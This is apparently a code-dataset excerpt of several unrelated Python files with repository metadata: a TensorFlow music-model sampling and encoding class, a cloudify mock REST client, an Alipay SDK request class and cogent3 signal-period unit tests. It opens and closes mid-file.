saver = tf.train.Saver(var_map)
saver.restore(self._sess, checkpoint_path)
def sample(self, n=None, length=None, temperature=1.0, same_z=False,
c_input=None):
"""Generates random samples from the model.
Args:
n: The number of samples to return. A full batch will be returned if not
specified.
length: The maximum length of a sample in decoder iterations. Required
if end tokens are not being used.
temperature: The softmax temperature to use (if applicable).
same_z: Whether to use the same latent vector for all samples in the
batch (if applicable).
c_input: A sequence of control inputs to use for all samples (if
applicable).
Returns:
A list of samples as NoteSequence objects.
Raises:
ValueError: If `length` is not specified and an end token is not being
used.
"""
batch_size = self._config.hparams.batch_size
n = n or batch_size
z_size = self._config.hparams.z_size
if not length and self._config.data_converter.end_token is None:
raise ValueError(
'A length must be specified when the end token is not used.')
length = length or tf.int32.max
feed_dict = {
self._temperature: temperature,
self._max_length: length
}
if self._z_input is not None and same_z:
z = np.random.randn(z_size).astype(np.float32)
z = np.tile(z, (batch_size, 1))
feed_dict[self._z_input] = z
if self._c_input is not None:
feed_dict[self._c_input] = c_input
outputs = []
for _ in range(int(np.ceil(n / batch_size))):
if self._z_input is not None and not same_z:
feed_dict[self._z_input] = (
np.random.randn(batch_size, z_size).astype(np.float32))
outputs.append(self._sess.run(self._outputs, feed_dict))
samples = np.vstack(outputs)[:n]
if self._c_input is not None:
return self._config.data_converter.to_items(
samples, np.tile(np.expand_dims(c_input, 0), [batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(samples)
def encode(self, note_sequences, assert_same_length=False):
"""Encodes a collection of NoteSequences into latent vectors.
Args:
note_sequences: A collection of NoteSequence objects to encode.
assert_same_length: Whether to raise an AssertionError if all of the
extracted sequences are not the same length.
Returns:
The encoded `z`, `mu`, and `sigma` values.
Raises:
RuntimeError: If called for a non-conditional model.
NoExtractedExamplesException: If no examples were extracted.
MultipleExtractedExamplesException: If multiple examples were extracted.
AssertionError: If `assert_same_length` is True and any extracted
sequences differ in length.
"""
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
inputs = []
controls = []
lengths = []
for note_sequence in note_sequences:
extracted_tensors = self._config.data_converter.to_tensors(note_sequence)
if not extracted_tensors.inputs:
raise NoExtractedExamplesException(
'No examples extracted from NoteSequence: %s' % note_sequence)
if len(extracted_tensors.inputs) > 1:
raise MultipleExtractedExamplesException(
'Multiple (%d) examples extracted from NoteSequence: %s' %
(len(extracted_tensors.inputs), note_sequence))
inputs.append(extracted_tensors.inputs[0])
controls.append(extracted_tensors.controls[0])
lengths.append(extracted_tensors.lengths[0])
if assert_same_length and len(inputs[0]) != len(inputs[-1]):
raise AssertionError(
'Sequences 0 and %d have different lengths: %d vs %d' %
(len(inputs) - 1, len(inputs[0]), len(inputs[-1])))
return self.encode_tensors(inputs, lengths, controls)
def encode_tensors(self, input_tensors, lengths, control_tensors=None):
"""Encodes a collection of input tensors into latent vectors.
Args:
input_tensors: Collection of input tensors to encode.
lengths: Collection of lengths of input tensors.
control_tensors: Collection of control tensors to encode.
Returns:
The encoded `z`, `mu`, and `sigma` values.
Raises:
RuntimeError: If called for a non-conditional model.
"""
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
n = len(input_tensors)
input_depth = self._config.data_converter.input_depth
batch_size = self._config.hparams.batch_size
batch_pad_amt = -n % batch_size
if batch_pad_amt > 0:
input_tensors += [np.zeros([0, input_depth])] * batch_pad_amt
length_array = np.array(lengths, np.int32)
length_array = np.pad(
length_array,
[(0, batch_pad_amt)] + [(0, 0)] * (length_array.ndim - 1),
'constant')
max_length = max([len(t) for t in input_tensors])
inputs_array = np.zeros(
[len(input_tensors), max_length, input_depth])
for i, t in enumerate(input_tensors):
inputs_array[i, :len(t)] = t
control_depth = self._config.data_converter.control_depth
controls_array = np.zeros(
[len(input_tensors), max_length, control_depth])
if control_tensors is not None:
control_tensors += [np.zeros([0, control_depth])] * batch_pad_amt
for i, t in enumerate(control_tensors):
controls_array[i, :len(t)] = t
outputs = []
for i in range(len(inputs_array) // batch_size):
batch_begin = i * batch_size
batch_end = (i+1) * batch_size
feed_dict = {self._inputs: inputs_array[batch_begin:batch_end],
self._controls: controls_array[batch_begin:batch_end],
self._inputs_length: length_array[batch_begin:batch_end]}
outputs.append(
self._sess.run([self._z, self._mu, self._sigma], feed_dict))
assert outputs
return tuple(np.vstack(v)[:n] for v in zip(*outputs))
def decode(self, z, length=None, temperature=1.0, c_input=None):
"""Decodes a collection of latent vectors into NoteSequences.
Args:
z: A collection of latent vectors to decode.
length: The maximum length of a sample in decoder iterations. Required
if end tokens are not being used.
temperature: The softmax temperature to use (if applicable).
c_input: Control sequence (if applicable).
Returns:
A list of decodings as NoteSequence objects.
Raises:
RuntimeError: If called for a non-conditional model.
ValueError: If `length` is not specified and an end token is not being
used.
"""
tensors = self.decode_to_tensors(z, length, temperature, c_input)
if self._c_input is not None:
return self._config.data_converter.to_items(
tensors, np.tile(np.expand_dims(c_input, 0),
[self._config.hparams.batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(tensors)
def decode_to_tensors(self, z, length=None, temperature=1.0, c_input=None,
return_full_results=False):
"""Decodes a collection of latent vectors into output tensors.
Args:
z: A collection of latent vectors to decode.
length: The maximum length of a sample in decoder iterations. Required
if end tokens are not being used.
temperature: The softmax temperature to use (if applicable).
c_input: Control sequence (if applicable).
return_full_results: If true will return the full decoder_results,
otherwise it will return only the samples.
Returns:
If return_full_results is True, will return the full decoder_results list,
otherwise it will return the samples from the decoder as a 2D numpy array.
Raises:
RuntimeError: If called for a non-conditional model.
ValueError: If `length` is not specified and an end token is not being
used.
"""
if not self._config.hparams.z_size:
raise RuntimeError('Cannot decode with a non-conditional model.')
if not length and self._config.data_converter.end_token is None:
raise ValueError(
'A length must be specified when the end token is not used.')
batch_size = self._config.hparams.batch_size
n = len(z)
length = length or tf.int32.max
batch_pad_amt = -n % batch_size
z = np.pad(z, [(0, batch_pad_amt), (0, 0)], mode='constant')
outputs = []
for i in range(len(z) // batch_size):
feed_dict = {
self._temperature: temperature,
self._z_input: z[i*batch_size:(i+1)*batch_size],
self._max_length: length,
}
if self._c_input is not None:
feed_dict[self._c_input] = c_input
if return_full_results:
outputs.extend(self._sess.run(self._decoder_results, feed_dict))
else:
outputs.extend(self._sess.run(self._outputs, feed_dict))
return outputs[:n]
| 39.964392 | 80 | 0.676938 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
import numpy as np
import tensorflow as tf
class NoExtractedExamplesException(Exception):
pass
class MultipleExtractedExamplesException(Exception):
pass
class TrainedModel(object):
def __init__(self, config, batch_size, checkpoint_dir_or_path=None,
var_name_substitutions=None, session_target='', **sample_kwargs):
checkpoint_path = (tf.train.latest_checkpoint(checkpoint_dir_or_path)
if tf.gfile.IsDirectory(checkpoint_dir_or_path) else
checkpoint_dir_or_path)
self._config = copy.deepcopy(config)
self._config.hparams.batch_size = batch_size
with tf.Graph().as_default():
model = self._config.model
model.build(
self._config.hparams,
self._config.data_converter.output_depth,
is_training=False)
self._temperature = tf.placeholder(tf.float32, shape=())
self._z_input = (
tf.placeholder(tf.float32,
shape=[batch_size, self._config.hparams.z_size])
if self._config.hparams.z_size else None)
self._c_input = (
tf.placeholder(
tf.float32,
shape=[None, self._config.data_converter.control_depth])
if self._config.data_converter.control_depth > 0 else None)
self._inputs = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.input_depth])
self._controls = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.control_depth])
self._inputs_length = tf.placeholder(
tf.int32,
shape=[batch_size] + list(self._config.data_converter.length_shape))
self._max_length = tf.placeholder(tf.int32, shape=())
self._outputs, self._decoder_results = model.sample(
batch_size,
max_length=self._max_length,
z=self._z_input,
c_input=self._c_input,
temperature=self._temperature,
**sample_kwargs)
if self._config.hparams.z_size:
q_z = model.encode(self._inputs, self._inputs_length, self._controls)
self._mu = q_z.loc
self._sigma = q_z.scale.diag
self._z = q_z.sample()
var_map = None
if var_name_substitutions is not None:
var_map = {}
for v in tf.global_variables():
var_name = v.name[:-2]
for pattern, substitution in var_name_substitutions:
var_name = re.sub(pattern, substitution, var_name)
if var_name != v.name[:-2]:
tf.logging.info('Renaming `%s` to `%s`.', v.name[:-2], var_name)
var_map[var_name] = v
self._sess = tf.Session(target=session_target)
saver = tf.train.Saver(var_map)
saver.restore(self._sess, checkpoint_path)
def sample(self, n=None, length=None, temperature=1.0, same_z=False,
c_input=None):
batch_size = self._config.hparams.batch_size
n = n or batch_size
z_size = self._config.hparams.z_size
if not length and self._config.data_converter.end_token is None:
raise ValueError(
'A length must be specified when the end token is not used.')
length = length or tf.int32.max
feed_dict = {
self._temperature: temperature,
self._max_length: length
}
if self._z_input is not None and same_z:
z = np.random.randn(z_size).astype(np.float32)
z = np.tile(z, (batch_size, 1))
feed_dict[self._z_input] = z
if self._c_input is not None:
feed_dict[self._c_input] = c_input
outputs = []
for _ in range(int(np.ceil(n / batch_size))):
if self._z_input is not None and not same_z:
feed_dict[self._z_input] = (
np.random.randn(batch_size, z_size).astype(np.float32))
outputs.append(self._sess.run(self._outputs, feed_dict))
samples = np.vstack(outputs)[:n]
if self._c_input is not None:
return self._config.data_converter.to_items(
samples, np.tile(np.expand_dims(c_input, 0), [batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(samples)
def encode(self, note_sequences, assert_same_length=False):
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
inputs = []
controls = []
lengths = []
for note_sequence in note_sequences:
extracted_tensors = self._config.data_converter.to_tensors(note_sequence)
if not extracted_tensors.inputs:
raise NoExtractedExamplesException(
'No examples extracted from NoteSequence: %s' % note_sequence)
if len(extracted_tensors.inputs) > 1:
raise MultipleExtractedExamplesException(
'Multiple (%d) examples extracted from NoteSequence: %s' %
(len(extracted_tensors.inputs), note_sequence))
inputs.append(extracted_tensors.inputs[0])
controls.append(extracted_tensors.controls[0])
lengths.append(extracted_tensors.lengths[0])
if assert_same_length and len(inputs[0]) != len(inputs[-1]):
raise AssertionError(
'Sequences 0 and %d have different lengths: %d vs %d' %
(len(inputs) - 1, len(inputs[0]), len(inputs[-1])))
return self.encode_tensors(inputs, lengths, controls)
def encode_tensors(self, input_tensors, lengths, control_tensors=None):
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
n = len(input_tensors)
input_depth = self._config.data_converter.input_depth
batch_size = self._config.hparams.batch_size
batch_pad_amt = -n % batch_size
if batch_pad_amt > 0:
input_tensors += [np.zeros([0, input_depth])] * batch_pad_amt
length_array = np.array(lengths, np.int32)
length_array = np.pad(
length_array,
[(0, batch_pad_amt)] + [(0, 0)] * (length_array.ndim - 1),
'constant')
max_length = max([len(t) for t in input_tensors])
inputs_array = np.zeros(
[len(input_tensors), max_length, input_depth])
for i, t in enumerate(input_tensors):
inputs_array[i, :len(t)] = t
control_depth = self._config.data_converter.control_depth
controls_array = np.zeros(
[len(input_tensors), max_length, control_depth])
if control_tensors is not None:
control_tensors += [np.zeros([0, control_depth])] * batch_pad_amt
for i, t in enumerate(control_tensors):
controls_array[i, :len(t)] = t
outputs = []
for i in range(len(inputs_array) // batch_size):
batch_begin = i * batch_size
batch_end = (i+1) * batch_size
feed_dict = {self._inputs: inputs_array[batch_begin:batch_end],
self._controls: controls_array[batch_begin:batch_end],
self._inputs_length: length_array[batch_begin:batch_end]}
outputs.append(
self._sess.run([self._z, self._mu, self._sigma], feed_dict))
assert outputs
return tuple(np.vstack(v)[:n] for v in zip(*outputs))
def decode(self, z, length=None, temperature=1.0, c_input=None):
tensors = self.decode_to_tensors(z, length, temperature, c_input)
if self._c_input is not None:
return self._config.data_converter.to_items(
tensors, np.tile(np.expand_dims(c_input, 0),
[self._config.hparams.batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(tensors)
def decode_to_tensors(self, z, length=None, temperature=1.0, c_input=None,
return_full_results=False):
if not self._config.hparams.z_size:
raise RuntimeError('Cannot decode with a non-conditional model.')
if not length and self._config.data_converter.end_token is None:
raise ValueError(
'A length must be specified when the end token is not used.')
batch_size = self._config.hparams.batch_size
n = len(z)
length = length or tf.int32.max
batch_pad_amt = -n % batch_size
z = np.pad(z, [(0, batch_pad_amt), (0, 0)], mode='constant')
outputs = []
for i in range(len(z) // batch_size):
feed_dict = {
self._temperature: temperature,
self._z_input: z[i*batch_size:(i+1)*batch_size],
self._max_length: length,
}
if self._c_input is not None:
feed_dict[self._c_input] = c_input
if return_full_results:
outputs.extend(self._sess.run(self._decoder_results, feed_dict))
else:
outputs.extend(self._sess.run(self._outputs, feed_dict))
return outputs[:n]
| true | true |
1c2ca31a29d1b7f2731163603636af4932896ea7 | 411 | py | Python | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 128 | 2022-03-24T21:54:28.000Z | 2022-03-31T20:15:41.000Z | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 2 | 2022-03-28T20:58:38.000Z | 2022-03-31T18:43:43.000Z | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 3 | 2022-03-25T13:34:02.000Z | 2022-03-30T21:57:04.000Z | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from .transforms import * # noqa F401
from .utils import * # noqa F401
from .imagenet_zeroshot_data import * # noqa F401
from .multitask import * # noqa F401
from .datamodules import * # noqa F401
| 34.25 | 71 | 0.742092 |
from .transforms import *
from .utils import *
from .imagenet_zeroshot_data import *
from .multitask import *
from .datamodules import *
| true | true |
1c2ca48001838c748ecda70e87d40f377105808a | 3,231 | py | Python | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
from cloudify_rest_client.agents import Agent
from cloudify_rest_client import CloudifyClient
from cloudify_rest_client.executions import Execution
from cloudify_rest_client.node_instances import NodeInstance
node_instances = {}
def put_node_instance(node_instance_id,
state='started',
runtime_properties=None,
relationships=None):
node_instances[node_instance_id] = NodeInstance({
'id': node_instance_id,
'state': state,
'version': 0,
'runtime_properties': runtime_properties,
'relationships': relationships
})
class MockRestclient(CloudifyClient):
def __init__(self):
pass
@property
def node_instances(self):
return MockNodeInstancesClient()
@property
def nodes(self):
return MockNodesClient()
@property
def executions(self):
return MockExecutionsClient()
@property
def manager(self):
return MockManagerClient()
@property
def agents(self):
return MockAgentsClient()
@property
def operations(self):
return MockOperationsClient()
class MockNodesClient(object):
def list(self, deployment_id):
return []
class MockNodeInstancesClient(object):
def get(self, node_instance_id, evaluate_functions=False):
if node_instance_id not in node_instances:
raise RuntimeError(
'No info for node with id {0}'.format(node_instance_id))
return node_instances[node_instance_id]
def list(self, deployment_id):
return []
class MockExecutionsClient(object):
def update(self, *args, **kwargs):
return None
def get(self, id):
return Execution({
'id': '111',
'status': 'terminated'
})
class MockManagerClient(object):
def get_context(self):
return {'context': {}}
class MockAgentsClient(object):
def update(self, name, state):
return Agent({
'id': name,
'name': name,
'state': state
})
def get(self, name):
return Agent({
'id': name,
'name': name,
'state': 'started'
})
def create(self, name, node_instance_id, state, create_rabbitmq_user=True,
**kwargs):
return Agent({
'id': name,
'name': name,
'node_instance_id': node_instance_id,
'state': state,
'create_rabbitmq_user': create_rabbitmq_user
})
class MockOperationsClient(object):
def update(self, operation_id, state):
pass
| 24.477273 | 78 | 0.629836 |
_client import CloudifyClient
from cloudify_rest_client.executions import Execution
from cloudify_rest_client.node_instances import NodeInstance
node_instances = {}
def put_node_instance(node_instance_id,
state='started',
runtime_properties=None,
relationships=None):
node_instances[node_instance_id] = NodeInstance({
'id': node_instance_id,
'state': state,
'version': 0,
'runtime_properties': runtime_properties,
'relationships': relationships
})
class MockRestclient(CloudifyClient):
def __init__(self):
pass
@property
def node_instances(self):
return MockNodeInstancesClient()
@property
def nodes(self):
return MockNodesClient()
@property
def executions(self):
return MockExecutionsClient()
@property
def manager(self):
return MockManagerClient()
@property
def agents(self):
return MockAgentsClient()
@property
def operations(self):
return MockOperationsClient()
class MockNodesClient(object):
def list(self, deployment_id):
return []
class MockNodeInstancesClient(object):
def get(self, node_instance_id, evaluate_functions=False):
if node_instance_id not in node_instances:
raise RuntimeError(
'No info for node with id {0}'.format(node_instance_id))
return node_instances[node_instance_id]
def list(self, deployment_id):
return []
class MockExecutionsClient(object):
def update(self, *args, **kwargs):
return None
def get(self, id):
return Execution({
'id': '111',
'status': 'terminated'
})
class MockManagerClient(object):
def get_context(self):
return {'context': {}}
class MockAgentsClient(object):
def update(self, name, state):
return Agent({
'id': name,
'name': name,
'state': state
})
def get(self, name):
return Agent({
'id': name,
'name': name,
'state': 'started'
})
def create(self, name, node_instance_id, state, create_rabbitmq_user=True,
**kwargs):
return Agent({
'id': name,
'name': name,
'node_instance_id': node_instance_id,
'state': state,
'create_rabbitmq_user': create_rabbitmq_user
})
class MockOperationsClient(object):
def update(self, operation_id, state):
pass
| true | true |
1c2ca5caff5ef0a6f27869b1cd2cf147940affc7 | 3,960 | py | Python | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayCommerceYuntaskResumeModel import AlipayCommerceYuntaskResumeModel
class AlipayCommerceYuntaskResumeRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayCommerceYuntaskResumeModel):
self._biz_content = value
else:
self._biz_content = AlipayCommerceYuntaskResumeModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.commerce.yuntask.resume'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.310345 | 148 | 0.643939 |
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayCommerceYuntaskResumeModel import AlipayCommerceYuntaskResumeModel
class AlipayCommerceYuntaskResumeRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayCommerceYuntaskResumeModel):
self._biz_content = value
else:
self._biz_content = AlipayCommerceYuntaskResumeModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.commerce.yuntask.resume'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| true | true |
1c2ca6bd4627da89353bbf6e0e73bd6a23178cc2 | 11,633 | py | Python | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | from numpy import arange, array, convolve, exp, float64, pi, random, sin, zeros
from cogent3.maths.period import _autocorr_inner2 as py_autocorr_inner
from cogent3.maths.period import _goertzel_inner as py_goertzel_inner
from cogent3.maths.period import _ipdft_inner2 as py_ipdft_inner
from cogent3.maths.period import auto_corr, dft, goertzel, hybrid, ipdft
from cogent3.maths.period_numba import autocorr_inner as numba_autocorr_inner
from cogent3.maths.period_numba import goertzel_inner as numba_goertzel_inner
from cogent3.maths.period_numba import ipdft_inner as numba_ipdft_inner
from cogent3.util.unit_test import TestCase, main
__author__ = "Hua Ying, Julien Epps and Gavin Huttley"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Julien Epps", "Hua Ying", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2020.2.7a"
__maintainer__ = "Gavin Huttley"
__email__ = "Gavin.Huttley@anu.edu.au"
__status__ = "Production"
class TestPeriod(TestCase):
def setUp(self):
t = arange(0, 10, 0.1)
n = random.randn(len(t))
nse = convolve(n, exp(-t / 0.05)) * 0.1
nse = nse[: len(t)]
self.sig = sin(2 * pi * t) + nse
self.p = 10
def test_inner_funcs(self):
"""python and pyrexed implementation should be the same"""
x = array(
[
0.04874203,
0.56831373,
0.94267804,
0.95664485,
0.60719478,
-0.09037356,
-0.69897319,
-1.11239811,
-0.84127485,
-0.56281126,
0.02301213,
0.56250284,
1.0258557,
1.03906527,
0.69885916,
0.10103556,
-0.43248024,
-1.03160503,
-0.84901545,
-0.84934356,
0.00323728,
0.44344594,
0.97736748,
1.01635433,
0.38538423,
0.09869918,
-0.60441861,
-0.90175391,
-1.00166887,
-0.66303249,
-0.02070569,
0.76520328,
0.93462426,
0.97011673,
0.63199999,
0.0764678,
-0.55680168,
-0.92028808,
-0.98481451,
-0.57600588,
0.0482667,
0.57572519,
1.02077883,
0.93271663,
0.41581696,
-0.07639671,
-0.71426286,
-0.97730119,
-1.0370596,
-0.67919572,
0.03779302,
0.60408759,
0.87826068,
0.79126442,
0.69769622,
0.01419442,
-0.42917556,
-1.00100485,
-0.83945546,
-0.55746313,
0.12730859,
0.60057659,
0.98059721,
0.83275501,
0.69031804,
0.02277554,
-0.63982729,
-1.23680355,
-0.79477887,
-0.67773375,
-0.05204714,
0.51765381,
0.77691955,
0.8996709,
0.5153137,
0.01840839,
-0.65124866,
-1.13269058,
-0.92342177,
-0.45673709,
0.11212881,
0.50153941,
1.09329507,
0.96457193,
0.80271578,
-0.0041043,
-0.81750772,
-0.99259986,
-0.92343788,
-0.57694955,
0.13982059,
0.56653375,
0.82217563,
0.85162513,
0.3984116,
-0.18937514,
-0.65304629,
-1.0067146,
-1.0037422,
-0.68011283,
]
)
N = 100
period = 10
self.assertFloatEqual(
py_goertzel_inner(x, N, period), numba_goertzel_inner(x, N, period)
)
ulim = 8
N = 8
x = array([0.0, 1.0, 0.0, -1.0, 0.0, 1.0, 0.0, -1.0])
X = zeros(8, dtype="complex128")
W = array(
[
1.00000000e00 + 2.44929360e-16j,
-1.00000000e00 - 1.22464680e-16j,
-5.00000000e-01 - 8.66025404e-01j,
6.12323400e-17 - 1.00000000e00j,
3.09016994e-01 - 9.51056516e-01j,
5.00000000e-01 - 8.66025404e-01j,
6.23489802e-01 - 7.81831482e-01j,
7.07106781e-01 - 7.07106781e-01j,
]
)
py_result = py_ipdft_inner(x, X, W, ulim, N)
numba_result = numba_ipdft_inner(x, X, W, ulim, N)
for i, j in zip(py_result, numba_result):
self.assertFloatEqual(abs(i), abs(j))
x = array(
[
-0.07827614,
0.56637551,
1.01320526,
1.01536245,
0.63548361,
0.08560101,
-0.46094955,
-0.78065656,
-0.8893556,
-0.56514145,
0.02325272,
0.63660719,
0.86291302,
0.82953598,
0.5706848,
0.11655242,
-0.6472655,
-0.86178218,
-0.96495057,
-0.76098445,
-0.18911517,
0.59280646,
1.00248693,
0.89241423,
0.52475111,
-0.01620599,
-0.60199278,
-0.98279829,
-1.12469771,
-0.61355799,
0.04321191,
0.52784788,
0.68508784,
0.86015123,
0.66825756,
-0.0802846,
-0.63626753,
-0.93023345,
-0.99129547,
-0.46891033,
0.04145813,
0.71226518,
1.01499246,
0.94726778,
0.63598143,
-0.21920589,
-0.48071702,
-0.86041579,
-0.9046141,
-0.55714746,
-0.10052384,
0.69708969,
1.02575789,
1.16524031,
0.49895282,
-0.13068573,
-0.45770419,
-0.86155787,
-0.9230734,
-0.6590525,
-0.05072955,
0.52380317,
1.02674335,
0.87778499,
0.4303284,
-0.01855665,
-0.62858193,
-0.93954774,
-0.94257301,
-0.49692951,
0.00699347,
0.69049074,
0.93906549,
1.06339809,
0.69337543,
0.00252569,
-0.57825881,
-0.88460603,
-0.99259672,
-0.73535697,
0.12064751,
0.91159174,
0.88966993,
1.02159917,
0.43479926,
-0.06159005,
-0.61782651,
-0.95284676,
-0.8218889,
-0.52166419,
0.021961,
0.52268762,
0.79428288,
1.01642697,
0.49060377,
-0.02183994,
-0.52743836,
-0.99363909,
-1.02963821,
-0.64249996,
]
)
py_xc = zeros(2 * len(x) - 1, dtype=float64)
numba_xc = py_xc.copy()
N = 100
py_autocorr_inner(x, py_xc, N)
